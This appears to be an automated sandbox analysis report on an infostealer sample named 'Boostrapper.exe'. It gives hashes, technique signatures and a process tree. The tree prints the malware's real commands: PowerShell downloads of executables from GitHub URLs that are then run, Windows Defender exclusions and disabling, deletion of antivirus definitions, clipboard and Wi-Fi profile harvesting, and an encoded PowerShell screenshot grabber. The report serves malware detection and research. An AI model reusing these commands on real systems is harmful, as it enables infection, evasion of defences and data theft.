Analysis

  • max time kernel
    95s
  • max time network
    92s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    25-11-2024 11:11

General

  • Target

    Boostrapper.exe

  • Size

    94KB

  • MD5

    a0faa8efdcb841126cc98047b0c4c659

  • SHA1

    4ef17c24f4cb9d42a4314afa466cb9a216465e30

  • SHA256

    979117f43af943864839dd1709da2d8e78390a052ba404b17c35500a65d06eae

  • SHA512

    f50dd4135929923c6b6d86ea9a0b6a44b7954dccfe270c8d4b2f9b820a793927e4e623c29e499f5e7bb9dcb6f5c183ba22ac1de018a76b07498857c7c4a5453d

  • SSDEEP

    1536:z7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfGwMYHhZOU:v7DhdC6kzWypvaQ0FxyNTBfGSHr

Malware Config

Signatures

  • AntiVM 1 IoCs

    Detects if the file is ran on tria.ge.

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Powershell Invoke Web Request.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 19 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 50 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • C# Executable 18 IoCs

    Detects C# .NET executables.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 59 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Boostrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\Boostrapper.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2632
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9DD6.tmp\9DD7.tmp\9DD8.bat C:\Users\Admin\AppData\Local\Temp\Boostrapper.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3936
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:3412
        • C:\Windows\system32\mode.com
          mode con: cols=80 lines=30
          3⤵
            PID:4304
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/Idkimcool9292/mspaint/refs/heads/main/Astraflux.zip' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Astraflux\Astraflux.zip' -ErrorAction SilentlyContinue >$null 2>&1"
            3⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4408
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\Astraflux\Astraflux.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\Astraflux' -Force -ErrorAction SilentlyContinue >$null 2>&1"
            3⤵
            • Hide Artifacts: Ignore Process Interrupts
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:900
          • C:\Windows\system32\timeout.exe
            timeout /t 2
            3⤵
            • Delays execution with timeout.exe
            PID:3696
          • C:\Users\Admin\AppData\Local\Temp\Astraflux\Astraflux\AstrafluxSS.exe
            "C:\Users\Admin\AppData\Local\Temp\Astraflux\Astraflux\AstrafluxSS.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:3924
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/Idkimcool9292/thesecondrun/refs/heads/main/Prototype.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\dbbe39943faad08a43d036d03a59704f5\Prototype.exe' -ErrorAction SilentlyContinue >$null 2>&1"
            3⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1784
          • C:\Users\Admin\AppData\Local\Temp\dbbe39943faad08a43d036d03a59704f5\Prototype.exe
            "C:\Users\Admin\AppData\Local\Temp\dbbe39943faad08a43d036d03a59704f5\Prototype.exe"
            3⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:404
            • C:\Users\Admin\AppData\Local\Temp\dbbe39943faad08a43d036d03a59704f5\Prototype.exe
              "C:\Users\Admin\AppData\Local\Temp\dbbe39943faad08a43d036d03a59704f5\Prototype.exe"
              4⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1696
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dbbe39943faad08a43d036d03a59704f5\Prototype.exe'"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1708
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dbbe39943faad08a43d036d03a59704f5\Prototype.exe'
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3520
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4276
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2360
                • C:\Program Files\Windows Defender\MpCmdRun.exe
                  "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                  6⤵
                  • Deletes Windows Defender Definitions
                  PID:1996
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:3536
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  6⤵
                  • Enumerates processes with tasklist
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2704
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2004
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic csproduct get uuid
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3812
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:324
                • C:\Windows\system32\reg.exe
                  REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                  6⤵
                    PID:1424
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2532
                  • C:\Windows\system32\reg.exe
                    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                    6⤵
                      PID:5064
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:656
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic path win32_VideoController get name
                      6⤵
                      • Detects videocard installed
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3036
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2280
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic path win32_VideoController get name
                      6⤵
                      • Detects videocard installed
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4880
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\dbbe39943faad08a43d036d03a59704f5\Prototype.exe""
                    5⤵
                    • Hide Artifacts: Hidden Files and Directories
                    • Suspicious use of WriteProcessMemory
                    PID:1784
                    • C:\Windows\system32\attrib.exe
                      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\dbbe39943faad08a43d036d03a59704f5\Prototype.exe"
                      6⤵
                      • Views/modifies file attributes
                      PID:3716
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​   .scr'"
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2972
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​   .scr'
                      6⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4460
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    5⤵
                      PID:5040
                      • C:\Windows\system32\tasklist.exe
                        tasklist /FO LIST
                        6⤵
                        • Enumerates processes with tasklist
                        PID:3400
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                      5⤵
                        PID:1816
                        • C:\Windows\system32\tasklist.exe
                          tasklist /FO LIST
                          6⤵
                          • Enumerates processes with tasklist
                          PID:408
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                        5⤵
                          PID:3964
                          • C:\Windows\System32\Wbem\WMIC.exe
                            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                            6⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2072
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                          5⤵
                          • Clipboard Data
                          PID:2888
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell Get-Clipboard
                            6⤵
                            • Clipboard Data
                            • Suspicious behavior: EnumeratesProcesses
                            PID:420
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                          5⤵
                            PID:2136
                            • C:\Windows\system32\tasklist.exe
                              tasklist /FO LIST
                              6⤵
                              • Enumerates processes with tasklist
                              PID:1120
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            5⤵
                              PID:1472
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                6⤵
                                  PID:740
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                5⤵
                                • System Network Configuration Discovery: Wi-Fi Discovery
                                PID:2564
                                • C:\Windows\system32\netsh.exe
                                  netsh wlan show profile
                                  6⤵
                                  • Event Triggered Execution: Netsh Helper DLL
                                  • System Network Configuration Discovery: Wi-Fi Discovery
                                  PID:1920
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "systeminfo"
                                5⤵
                                  PID:4832
                                  • C:\Windows\system32\systeminfo.exe
                                    systeminfo
                                    6⤵
                                    • Gathers system information
                                    PID:3912
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                  5⤵
                                    PID:3940
                                    • C:\Windows\system32\reg.exe
                                      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                      6⤵
                                        PID:2052
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                      5⤵
                                        PID:3792
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                          6⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:2244
                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\capvsksl\capvsksl.cmdline"
                                            7⤵
                                              PID:2772
                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB2E0.tmp" "c:\Users\Admin\AppData\Local\Temp\capvsksl\CSC94A724D51DD04CBEB81C787C16C1F0DE.TMP"
                                                8⤵
                                                  PID:4860
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            5⤵
                                              PID:2388
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                6⤵
                                                  PID:3716
